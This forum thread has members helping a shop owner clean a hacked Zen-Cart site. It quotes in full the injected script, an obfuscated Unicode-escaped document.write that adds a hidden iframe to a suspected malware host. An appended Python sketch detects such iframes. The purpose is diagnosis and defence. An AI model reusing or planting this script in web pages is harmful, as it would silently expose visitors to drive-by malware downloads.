Archive for Downsizer For an ethical approach to consumption
 


Grimnir

My site has a virus :(

I need some help with my site; it's been hacked and is producing virus warnings. It's based on the Zen-Cart software using PHP, and while I can just about manage to follow the instructions on customising and configuring it, I don't know enough to know where to look for a virus.

Any suggestions/help would be very much appreciated.
jema

A link to the site would help.
Grimnir

www.heathenpeddler.co.uk/tees
jema

What makes you sure it is hacked? I see an odd script, but it seems harmless enough as it just generates a Google iframe to:

stat-google.com
MarkS

Code:
script type="text/javascript"
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0073\u0074\u0061\u0074\u002d\u0067\u006f\u006f\u0067\u006c\u0065\u002e\u0063\u006f\u006d\u002f\u0063\u006f\u0075\u006e\u0074\u0065\u0072\u002f\u006f\u0075\u0074\u002e\u0070\u0068\u0070\u003f\u0073\u005f\u0069\u0064\u003d\u0031\u0022\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0022\u0030\u0022\u0020\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0022\u0030\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u0020\u0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u003b\u0020\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0020\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u0020\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')


This script after the HTML?
sean

Congratulations on the widest post in the history of Downsizer. Wink
Jonnyboy

WTF has "latest posts" gone? Wink
Jamanda

Jonnyboy wrote:
WTF has "latest posts" gone? Wink


About half a mile to the right.
The quotes button is the full mile.

Edited because I don't know my right from my left Embarrassed
Jonnyboy

Do you mean right?
Jamanda

You beat me Laughing
sean

Her school didn't do GCSE Handedness. Wink
Grimnir

MarkS - where did you find that script? I'm trying to find the affected file but apart from the redirector I use on the root directory I haven't found it yet :S

*edit* Never mind, found the script and removed it - I hope!

I've found out it's downloading something from "check/n14041.htm" (not putting the full URL in as it's a definite baddie). It loads a connector to the net and downloads trojans and other viruses. A good virus checker usually catches it, but that's not the point, is it?
MarkS

Is stat-google really Google though?

I just did a quick look and it resolves to an IP in Malaysia....
vegplot

Has Zen Cart issued a security update to prevent this from happening?
jema

MarkS wrote:
Is stat-google really Google though?

I just did a quick look and it resolves to an IP in Malaysia....


That is certainly the question! And whilst whois suggests it is, I'm skeptical. Certainly, unless you know a weird iframe is there for a legit reason, it should be removed.
Grimnir

There shouldn't be any links to any external sites except for the banner ads at the bottom of the page, so it definitely isn't meant to be there. I think I've found the culprit; at least it's not popping up a virus warning now, so hopefully it's OK.
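
Added example, not part of any post in this thread: a Python sketch that decodes \uXXXX-escaped document.write() strings like the one MarkS posted and searches a web root for files that write an invisible iframe, which is the file hunt Grimnir describes. The file extensions, the hidden-iframe heuristics and the sample host counter.example.invalid are assumptions made for the example.

```python
import re
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

WRITE_CALL = re.compile(r"document\.write\(\s*(['\"])(.*?)\1\s*\)", re.S)
JS_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})")

def decode_js_escapes(literal):
    """Turn \\uXXXX / \\xXX escapes from a JS string literal into characters."""
    return JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), literal)

class _IframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.frames = []
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append({k: (v or "") for k, v in attrs})

def hidden_iframes(text):
    """Return [(src, host)] for invisible iframes written via document.write."""
    hits = []
    for m in WRITE_CALL.finditer(text):
        finder = _IframeFinder()
        finder.feed(decode_js_escapes(m.group(2)))
        for a in finder.frames:
            style = a.get("style", "").replace(" ", "").lower()
            invisible = (a.get("width") == "0" or a.get("height") == "0"
                         or "display:none" in style or "visibility:hidden" in style)
            if invisible:
                hits.append((a.get("src", ""), urlparse(a.get("src", "")).hostname))
    return hits

def scan_tree(root, exts=(".php", ".html", ".htm", ".js", ".tpl")):
    """Map each file under root that carries such an iframe to its findings."""
    report = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in exts:
            found = hidden_iframes(p.read_text(errors="replace"))
            if found:
                report[str(p)] = found
    return report

# Constructed sample: same shape as the posted script, placeholder host.
_PLAIN = '<iframe src="http://counter.example.invalid/c.php?id=1" width="0" height="0" style="display: none"></iframe>'
SAMPLE = "</html>\n<script>document.write('%s')</script>" % "".join("\\u%04x" % ord(c) for c in _PLAIN)
if __name__ == "__main__":
    print(hidden_iframes(SAMPLE))
```

Run scan_tree() against a downloaded copy of the site and compare every reported host with the external sites the pages are meant to load.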